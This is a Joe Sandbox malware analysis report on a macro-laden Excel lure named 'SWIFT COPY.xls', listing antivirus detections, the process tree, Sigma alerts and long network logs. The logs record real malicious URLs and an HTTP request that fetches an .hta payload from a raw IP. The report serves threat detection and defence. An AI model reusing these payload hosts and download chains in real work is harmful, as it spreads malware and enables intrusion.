Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SWIFT COPY.xls

Overview

General Information

Sample name:SWIFT COPY.xls
Analysis ID:1636401
MD5:b731eb838e4e8d534ea62b2ebf15dcda
SHA1:2c2d81fef7800be7c3ddbbac94cd8fb7faf09bd7
SHA256:08cfe7d6a9b65191e9e1b21080083572b724a1dd985b11377586c6d0562d6e73
Tags:xlsuser-abuse_ch
Infos:

Detection

Score:60
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Excel sheet contains many unusual embedded objects
Detected non-DNS traffic on DNS port
Document contains embedded VBA macros
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w11x64_office
  • EXCEL.EXE (PID: 7520 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: F9F7B6C42211B06E7AC3E4B60AA8FB77)
    • splwow64.exe (PID: 7336 cmdline: C:\Windows\splwow64.exe 12288 MD5: AF4A7EBF6114EE9E6FBCC910EC3C96E6)
  • EXCEL.EXE (PID: 1264 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\SWIFT COPY.xls" MD5: F9F7B6C42211B06E7AC3E4B60AA8FB77)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Excel Network Connections
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 5.161.200.29, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7520, Protocol: tcp, SourceIp: 192.168.2.26, SourceIsIpv6: false, SourcePort: 61467
Sigma detected: Suspicious Office Outbound Connections
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.26, DestinationIsIpv6: false, DestinationPort: 61467, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7520, Protocol: tcp, SourceIp: 5.161.200.29, SourceIsIpv6: false, SourcePort: 443

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: SWIFT COPY.xlsAvira: detected
Multi AV Scanner detection for submitted file
Source: SWIFT COPY.xlsVirustotal: Detection: 26%Perma Link
Source: SWIFT COPY.xlsReversingLabs: Detection: 34%
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEDirectory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior
Source: global trafficDNS query: name: browser.events.data.msn.cn
Source: global trafficDNS query: name: st3.pro
Source: global trafficDNS query: name: link.saja.market
Source: global trafficDNS query: name: otelrules.svc.static.microsoft
Source: global trafficTCP traffic: 192.168.2.26:61467 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.26:61468 -> 3.39.153.44:443
Source: global trafficTCP traffic: 192.168.2.26:61469 -> 23.95.235.45:80
Source: global trafficTCP traffic: 192.168.2.26:61467 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.26:61467 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.26:61467 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.26:61467 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.26:61467 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.26:61467 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.26:61467 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.26:61467 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.26:61467 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.26:61467 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.26:61467 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.26:61467 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.26:61467 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.26:61467 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.26:61468 -> 3.39.153.44:443
Source: global trafficTCP traffic: 192.168.2.26:61468 -> 3.39.153.44:443
Source: global trafficTCP traffic: 192.168.2.26:61468 -> 3.39.153.44:443
Source: global trafficTCP traffic: 192.168.2.26:61468 -> 3.39.153.44:443
Source: global trafficTCP traffic: 192.168.2.26:61468 -> 3.39.153.44:443
Source: global trafficTCP traffic: 192.168.2.26:61468 -> 3.39.153.44:443
Source: global trafficTCP traffic: 192.168.2.26:61468 -> 3.39.153.44:443
Source: global trafficTCP traffic: 192.168.2.26:61468 -> 3.39.153.44:443
Source: global trafficTCP traffic: 192.168.2.26:61468 -> 3.39.153.44:443
Source: global trafficTCP traffic: 192.168.2.26:61468 -> 3.39.153.44:443
Source: global trafficTCP traffic: 192.168.2.26:61468 -> 3.39.153.44:443
Source: global trafficTCP traffic: 192.168.2.26:61468 -> 3.39.153.44:443
Source: global trafficTCP traffic: 192.168.2.26:61468 -> 3.39.153.44:443
Source: global trafficTCP traffic: 192.168.2.26:61470 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.26:61470 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.26:61471 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.26:61471 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.26:61470 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.26:61471 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.26:61470 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.26:61470 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.26:61471 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.26:61471 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.26:61463 -> 162.159.36.2:53
Source: global trafficTCP traffic: 162.159.36.2:53 -> 192.168.2.26:61463
Source: global trafficTCP traffic: 192.168.2.26:61463 -> 162.159.36.2:53
Source: global trafficTCP traffic: 162.159.36.2:53 -> 192.168.2.26:61463
Source: global trafficTCP traffic: 192.168.2.26:61463 -> 162.159.36.2:53
Source: global trafficTCP traffic: 162.159.36.2:53 -> 192.168.2.26:61463
Source: global trafficTCP traffic: 192.168.2.26:61463 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.26:61467 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.26:61467
Source: global trafficTCP traffic: 192.168.2.26:61467 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.26:61467 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.26:61467
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.26:61467
Source: global trafficTCP traffic: 192.168.2.26:61467 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.26:61467 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.26:61467
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.26:61467
Source: global trafficTCP traffic: 192.168.2.26:61467 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.26:61467 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.26:61467
Source: global trafficTCP traffic: 192.168.2.26:61467 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.26:61467
Source: global trafficTCP traffic: 192.168.2.26:61467 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.26:61467 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.26:61467
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.26:61467
Source: global trafficTCP traffic: 192.168.2.26:61467 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.26:61467
Source: global trafficTCP traffic: 192.168.2.26:61467 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.26:61467 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.26:61467
Source: global trafficTCP traffic: 192.168.2.26:61467 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.26:61468 -> 3.39.153.44:443
Source: global trafficTCP traffic: 3.39.153.44:443 -> 192.168.2.26:61468
Source: global trafficTCP traffic: 192.168.2.26:61468 -> 3.39.153.44:443
Source: global trafficTCP traffic: 192.168.2.26:61468 -> 3.39.153.44:443
Source: global trafficTCP traffic: 3.39.153.44:443 -> 192.168.2.26:61468
Source: global trafficTCP traffic: 3.39.153.44:443 -> 192.168.2.26:61468
Source: global trafficTCP traffic: 192.168.2.26:61468 -> 3.39.153.44:443
Source: global trafficTCP traffic: 192.168.2.26:61468 -> 3.39.153.44:443
Source: global trafficTCP traffic: 3.39.153.44:443 -> 192.168.2.26:61468
Source: global trafficTCP traffic: 3.39.153.44:443 -> 192.168.2.26:61468
Source: global trafficTCP traffic: 192.168.2.26:61468 -> 3.39.153.44:443
Source: global trafficTCP traffic: 192.168.2.26:61468 -> 3.39.153.44:443
Source: global trafficTCP traffic: 3.39.153.44:443 -> 192.168.2.26:61468
Source: global trafficTCP traffic: 192.168.2.26:61468 -> 3.39.153.44:443
Source: global trafficTCP traffic: 3.39.153.44:443 -> 192.168.2.26:61468
Source: global trafficTCP traffic: 192.168.2.26:61468 -> 3.39.153.44:443
Source: global trafficTCP traffic: 192.168.2.26:61468 -> 3.39.153.44:443
Source: global trafficTCP traffic: 3.39.153.44:443 -> 192.168.2.26:61468
Source: global trafficTCP traffic: 3.39.153.44:443 -> 192.168.2.26:61468
Source: global trafficTCP traffic: 3.39.153.44:443 -> 192.168.2.26:61468
Source: global trafficTCP traffic: 192.168.2.26:61468 -> 3.39.153.44:443
Source: global trafficTCP traffic: 192.168.2.26:61468 -> 3.39.153.44:443
Source: global trafficTCP traffic: 192.168.2.26:61468 -> 3.39.153.44:443
Source: global trafficTCP traffic: 3.39.153.44:443 -> 192.168.2.26:61468
Source: global trafficTCP traffic: 192.168.2.26:61469 -> 23.95.235.45:80
Source: global trafficTCP traffic: 23.95.235.45:80 -> 192.168.2.26:61469
Source: global trafficTCP traffic: 192.168.2.26:61469 -> 23.95.235.45:80
Source: global trafficTCP traffic: 192.168.2.26:61469 -> 23.95.235.45:80
Source: global trafficTCP traffic: 23.95.235.45:80 -> 192.168.2.26:61469
Source: global trafficTCP traffic: 192.168.2.26:61470 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.26:61470
Source: global trafficTCP traffic: 192.168.2.26:61470 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.26:61471 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.26:61471
Source: global trafficTCP traffic: 192.168.2.26:61471 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.26:61470 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.26:61470
Source: global trafficTCP traffic: 192.168.2.26:61471 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.26:61471
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.26:61470
Source: global trafficTCP traffic: 192.168.2.26:61470 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.26:61470 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.26:61470
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.26:61471
Source: global trafficTCP traffic: 192.168.2.26:61471 -> 13.107.246.67:443
Source: global trafficTCP traffic: 192.168.2.26:61471 -> 13.107.246.67:443
Source: global trafficTCP traffic: 13.107.246.67:443 -> 192.168.2.26:61471
Source: global trafficTCP traffic: 23.95.235.45:80 -> 192.168.2.26:61469
Source: global trafficTCP traffic: 192.168.2.26:61469 -> 23.95.235.45:80
Source: global trafficTCP traffic: 192.168.2.26:61469 -> 23.95.235.45:80
Source: global trafficTCP traffic: 23.95.235.45:80 -> 192.168.2.26:61469
Source: excel.exeMemory has grown: Private usage: 2MB later: 85MB
Source: global trafficTCP traffic: 192.168.2.26:61463 -> 162.159.36.2:53
Source: Joe Sandbox ViewIP Address: 13.107.246.67 13.107.246.67
Source: Joe Sandbox ViewIP Address: 3.39.153.44 3.39.153.44
Source: Joe Sandbox ViewIP Address: 5.161.200.29 5.161.200.29
Source: global trafficHTTP traffic detected: GET /K04HU0R?&enigma=dirty&metallurgist=small&motorcycle HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: st3.proConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /oXDrbQsGTO?&swimsuit=better&join=unaccountable&training HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: link.saja.market
Source: global trafficHTTP traffic detected: GET /342/cntro/kissingthebestpersonentiretimetogivebestthingsevermeet.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 23.95.235.45
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.45
Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.45
Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.45
Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.45
Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.45
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /K04HU0R?&enigma=dirty&metallurgist=small&motorcycle HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: st3.proConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /oXDrbQsGTO?&swimsuit=better&join=unaccountable&training HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: link.saja.market
Source: global trafficHTTP traffic detected: GET /342/cntro/kissingthebestpersonentiretimetogivebestthingsevermeet.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 23.95.235.45
Source: global trafficDNS traffic detected: DNS query: browser.events.data.msn.cn
Source: global trafficDNS traffic detected: DNS query: st3.pro
Source: global trafficDNS traffic detected: DNS query: link.saja.market
Source: global trafficDNS traffic detected: DNS query: otelrules.svc.static.microsoft
Source: Primary1741801097559363500_A6BFE9B8-725C-497F-9323-A8954BFF2CA2.log.14.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/v2.1601652342626/en-US/en-CH.en-GB.en-US/Metadata
Source: Primary1741800995818548700_F97F23E9-4EAF-41B7-94B8-F9B59026EFEB.log.0.drString found in binary or memory: https://res.cdn.office.net/mro1cdnstorage/fonts/prod/4.41/flatfontassets.pkg
Source: SWIFT COPY.xls, 79760000.0.drString found in binary or memory: https://st3.pro/K04HU0R?&enigma=dirty&metallurgist=small&motorcycle
Source: unknownNetwork traffic detected: HTTP traffic on port 61467 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61470
Source: unknownNetwork traffic detected: HTTP traffic on port 61471 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 61470 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61468
Source: unknownNetwork traffic detected: HTTP traffic on port 61468 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61471
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61467

System Summary

barindex
Excel sheet contains many unusual embedded objects
Source: SWIFT COPY.xlsOLE: Microsoft Excel 2007+
Source: 79760000.0.drOLE: Microsoft Excel 2007+
Source: SWIFT COPY.xlsOLE indicator, VBA macros: true
Source: classification engineClassification label: mal60.winXLS@4/13@4/4
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\79760000Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{F97F23E9-4EAF-41B7-94B8-F9B59026EFEB} - OProcSessId.datJump to behavior
Source: SWIFT COPY.xlsOLE indicator, Workbook stream: true
Source: 79760000.0.drOLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: SWIFT COPY.xlsVirustotal: Detection: 26%
Source: SWIFT COPY.xlsReversingLabs: Detection: 34%
Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\SWIFT COPY.xls"
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEDirectory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: SWIFT COPY.xlsStatic file information: File size 1261568 > 1048576
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior
Source: 79760000.0.drInitial sample: OLE indicators vbamacros = False
Source: SWIFT COPY.xlsInitial sample: OLE indicators encrypted = True
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
